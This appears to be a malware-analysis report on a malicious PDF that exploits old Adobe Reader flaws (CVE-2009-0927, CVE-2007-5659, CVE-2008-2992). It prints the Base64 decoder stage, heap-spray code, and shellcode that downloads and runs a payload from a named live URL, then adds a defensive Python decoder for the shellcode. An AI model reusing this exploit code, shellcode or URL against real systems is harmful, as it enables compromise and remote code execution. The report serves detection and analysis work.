Risk Score: 558 (MALICIOUS)
Malware Insights
MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
This PDF file carries JavaScript that exploits multiple Adobe Reader vulnerabilities (CVE-2009-0927, CVE-2007-5659, CVE-2008-2992), selecting the exploit branch by the viewer version that opens the file. The first-layer script decodes a Base64-wrapped second stage and runs it; that stage heap-sprays shellcode which contains a hardcoded URL and whose job is to download and execute a further payload from it.
Machine Learning
- Nyx PDF Classifier: malicious score 1.0000
Heuristics (11)

- Collab.getIcon (CVE-2009-0927) [critical; CVE exact; rule CVE_2009_0927]: PDF JavaScript calls Collab.getIcon. CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument; it allows arbitrary code execution. (identified after JavaScript deobfuscation)
- Collab.collectEmailInfo (CVE-2007-5659) [critical; CVE exact; rule CVE_2007_5659]: PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(); it is one of a series of Acrobat JavaScript API exploits. (identified after JavaScript deobfuscation)
- util.printf (CVE-2008-2992) [critical; CVE exact; rule CVE_2008_2992]: PDF JavaScript calls util.printf(). CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument; it was widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
- Pidief-style multi-CVE JavaScript dispatcher [critical; CVE likely; rule PDF_PIDIEF_MULTI_CVE_DISPATCH]: A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
- Multi-CVE Adobe Reader JavaScript exploit kit [critical; rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT]: One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
- JavaScript action [low; 3 related findings; rule PDF_JAVASCRIPT]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster [critical; rule PDF_JS_EXPLOIT_CLUSTER]: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- PDF JavaScript shellcode contains an embedded download URL [high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL]: Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream [low; rule PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact [info; rule EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info; rule EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://sexfid.com/exp/getexe.php?spl=pdf (referenced by PDF JavaScript)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| javascript_obj0009_000.js | 7cc288f1c8634cbada25a99e29f81ea0ac5bfd98d118b9c026a7bf836ea563a0 | pdf-javascript-stream | PDF /JS object 9 at offset 0xD6 | 19560 bytes |
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 4 eval/decoder/string-building tokens and 1 long base64-like blob)
Preview script (first 1,000 lines of the extracted script). This first layer is a Base64 decoder using the standard alphabet; the blob it decodes (elided below) is the second stage carved separately as custom_b64_stage_000.js.
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function decode64(input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do {
enc1 = keyStr.indexOf(input.charAt(i++));
enc2 = keyStr.indexOf(input.charAt(i++));
enc3 = keyStr.indexOf(input.charAt(i++));
enc4 = keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
} while (i < input.length);
return output;
}
var aasd = decode64("
... (truncated)
| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| custom_b64_stage_000.js | 880374c10ba0dc3b9c973d8d40c84dc20e0cf8c8a32a8b91a7207147b2068870 | deobfuscated-js | custom Base64 decoded JavaScript layer 2 (PDF /JS object 9) at offset 0x450 | 10478 bytes |

Detection
- ClamAV: Js.Exploit.Shellcode-18
- Obfuscation or payload: likely (carved artifact contains 9 eval/decoder/string-building tokens)
Preview script (first 1,000 lines of the extracted script). Reading the preview: `unescape("%u9090%u9090")` is the NOP-sled seed that the while loop doubles into the heap spray, `0x0c0c0c0c` is the classic spray landing address, and the long `%uXXXX` blob is the shellcode; read as little-endian 16-bit words, its final twenty escapes spell out the URL listed under EMBEDDED_URL above.
var pJVrXQrW0khAH5L7 = new Array();
var n1pxwtsjx0fdZSEg;
function rjXJAPpJ0WUQaqXO(qNMmGEWDNCrxe6dP, EBizaYJk5nAfdi4T){while (qNMmGEWDNCrxe6dP.length * 2 < EBizaYJk5nAfdi4T){qNMmGEWDNCrxe6dP += qNMmGEWDNCrxe6dP;}qNMmGEWDNCrxe6dP = qNMmGEWDNCrxe6dP.substring(0, EBizaYJk5nAfdi4T / 2);
return qNMmGEWDNCrxe6dP;}
function A7kGFGGqT1zYmpVZ(MYBtoSjHTiqFXMpY){
var dC83eqJ9ZAN8WCfl = unescape("%u9090%u9090");
var hsXrrtGOwlZfeWnu = MYBtoSjHTiqFXMpY - 0x700000;
var LMP7FgUCR4r6af1D = unescape("%uA164%u0018%u0000%u408B%u8B30%u5440%u408B%u8B04%u0440%u408B%u0D04%u0020%u0020%u7C3D%u7700%u7400%uC301%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A4E%uE2D1%uE22B%uEC8B%u45C7%u6E10%u652E%uC778%u1445%u01FF%u0000%u45C7%u0000%u0000%uEB00%u5A4F%u8352%u56EA%u5589%u5618%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u571C%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u458B%uAB10%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8318%u0CC4%uB050%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u1855%uC483%u930C%u3350%u50C0%u5650%u558B%u0318%u1455%u5052%u36B8%u2F1A%uFF70%u1855%u835B%u007D%u0F01%u9E85%u0000%u6A00%u6800%u0080%u0000%u036A%u006A%u036A%u0068%u0000%u56C0%uA5B8%u0017%uFF7C%u1855%u4589%u6A04%u6804%u1000%u0000%u0068%u0800%u6A00%uB800%uCA54%u91AF%u55FF%u8918%u0C45%u6A50%u8D00%u084D%u6851%u0000%u0008%uFF50%u0475%u16B8%uFA65%uFF10%u1855%u8B5F%u8317%u04C7%u4D8B%u8308%u04E9%uA7E8%u0000%u6A00%u6A00%u6A00%uFF00%u0475%uACB8%uDA08%uFF76%u1855%u006A%u4D8D%u5108%u75FF%uFF08%u0C75%u0483%u0424%u75FF%uB804%u791F%uE80A%u55FF%uFF18%u0475%uFBB8%uFD97%uFF0F%u1855%u45C7%u0200%u0000%u5700%uB856%uFE98%u0E8A%u55FF%uEB18%u182A%uF92A%uD2B7%uB377%u4501%u928A%uADB7%u5D50%u67E4%uE6F5%u1AC7%uABBF%u101E%u7642%uA1A2%u6354%u7B09%uB089%u97F4%u734E%u3F93%u83F1%u007D%u7402%uC760%u0045%u0001%u0000%u45C7%u7910%u652E%uC778%u1445%u0172%u0000%u7D8B%u0318%u147D%u26B9%u0000%u8B00%uFC57%u05E8%u0000%uE900%uFE7C%uFFFF%uC033%u078A%uC8D2%uC132%uD0F6%uC532%uC232%uC632%uC0D2%uC102%uC502%uC202%uC602%uC8D2%uC12A%uC52A%uD0F6%uC22A%uC62A%uC0D2%uC2D3%uCA0F%u0788%u4947%uCE75%uC3C3%u7468%u7074%u2F3A%u732F%u7865%u6966%u2E64%u6F63%u2F6D%u7865%u2F70%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664");
while (dC83eqJ9ZAN8WCfl.length<slackspace) dC83eqJ9ZAN8WCfl+=dC83eqJ9ZAN8WCfl;
LMP7FgUCR4r6af1D = MYBtoSjHTiqFXMpY.substring(0, MYBtoSjHTiqFXMpY);}
function pPGLenZ2zQydVc4K(cmKOKd9OQJ5429X8){
var DnTCb3DaTCEzoHKc = 0x0c0c0c0c;var Ge1OI0niSrmUzKbX = unescape("%uA164%u0018%u0000%u408B%u8B30%u5440%u408B%u8B04%u0440%u408B%u0D04%u0020%u0020%u7C3D%u7700%u7400%uC301%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A4E%uE2D1%uE22B%uEC8B%u45C7%u6E10%u652E%uC778%u1445%u01FF%u0000%u45C7%u0000%u0000%uEB00%u5A4F%u8352%u56EA%u5589%u5618%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u571C%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u458B%uAB10%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8318%u0CC4%uB050%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u1855%uC483%u930C%u3350%u50C0%u5650%u558B%u0318%u1455%u5052%u36B8%u2F1A%uFF70%u1855%u835B%u007D%u0F01%u9E85%u0000%u6A00%u6800%u0080%u0000%u036A%u006A%u036A%u0068%u0000%u56C0%uA5B8%u0017%uFF7C%u1855%u4589%u6A04%u6804%u1000%u0000%u0068%u0800%u6A00%uB800%uCA54%u91AF%u55FF%u8918%u0C45%u6A50%u8D00%u084D%u6851%u0000%u0008%uFF50%u0475%u16B8%uFA65%uFF10%u1855%u8B5F%u8317%u04C7%u4D8B%u8308%u04E9%uA7E8%u0000%u6A00%u6A00%u6A00%uFF00%u0475%uACB8%uDA08%uFF76%u1855%u006A%u4D8D%u5108%u75FF%uFF08%u0C75%u0483%u0424%u75FF%uB804%u791F%uE80A%u55FF%uFF18%u0475%uFBB8%uFD97%uFF0F%u1855%u45C7%u0200%u0
... (truncated)
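The PDF_JS_SHELLCODE_DOWNLOAD_URL finding can be reproduced from the preview by emulating JavaScript `unescape()` and reading the result as little-endian UTF-16, which is how the sprayed string sits in Reader's heap. The script below is an added example written for this page, not output of the analyzer; the two `%u` slices are copied from the custom_b64_stage_000.js preview above (the opening three words and the closing twenty), and the helper names and the strings-style scan are my own.

```python
import re
import struct

# Constructed inputs, copied from the custom_b64_stage_000.js preview in this report:
# the first three %u words of the shellcode blob and its last twenty.
SHELLCODE_HEAD = "%uA164%u0018%u0000"
SHELLCODE_TAIL = ("%u7468%u7074%u2F3A%u732F%u7865%u6966%u2E64%u6F63%u2F6D%u7865"
                  "%u2F70%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664")

ESC_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def js_unescape_bytes(escaped: str) -> bytes:
    """Emulate JavaScript unescape() and return the UTF-16LE image of the result.

    Reader stores the sprayed string as 16-bit code units, so %uXXXX becomes the
    low byte followed by the high byte; %XX and literal characters become one
    code unit each (low byte, then a zero high byte).
    """
    units, pos = [], 0
    for m in ESC_RE.finditer(escaped):
        units.extend(ord(c) for c in escaped[pos:m.start()])   # literal text between escapes
        units.append(int(m.group(1) or m.group(2), 16))
        pos = m.end()
    units.extend(ord(c) for c in escaped[pos:])
    return struct.pack("<%dH" % len(units), *units)


def extract_urls(blob: bytes) -> list:
    """Return every http(s) URL stored as plain ASCII inside the decoded shellcode."""
    return [m.group(0).decode("ascii") for m in URL_RE.finditer(blob)]


def printable_strings(blob: bytes, min_len: int = 4) -> list:
    """Crude strings(1): runs of printable ASCII, handy for spotting DLL and API names."""
    return [m.group(0).decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def has_teb_prologue(blob: bytes) -> bool:
    """64 A1 18 00 00 00 is `mov eax, fs:[0x18]`, the TEB read that opens the
    PEB walk 32-bit Windows shellcode uses to find kernel32 without imports."""
    return blob.startswith(bytes.fromhex("64a118000000"))


if __name__ == "__main__":
    body = js_unescape_bytes(SHELLCODE_HEAD + SHELLCODE_TAIL)
    print("TEB prologue:", has_teb_prologue(body))
    print("URLs:", extract_urls(body))
```

Run against the full blob from the preview, `printable_strings()` also surfaces the fragments of "urlmon.dll" that the shellcode pushes onto the stack piecewise, which is the urlmon download-and-execute behaviour the rule describes.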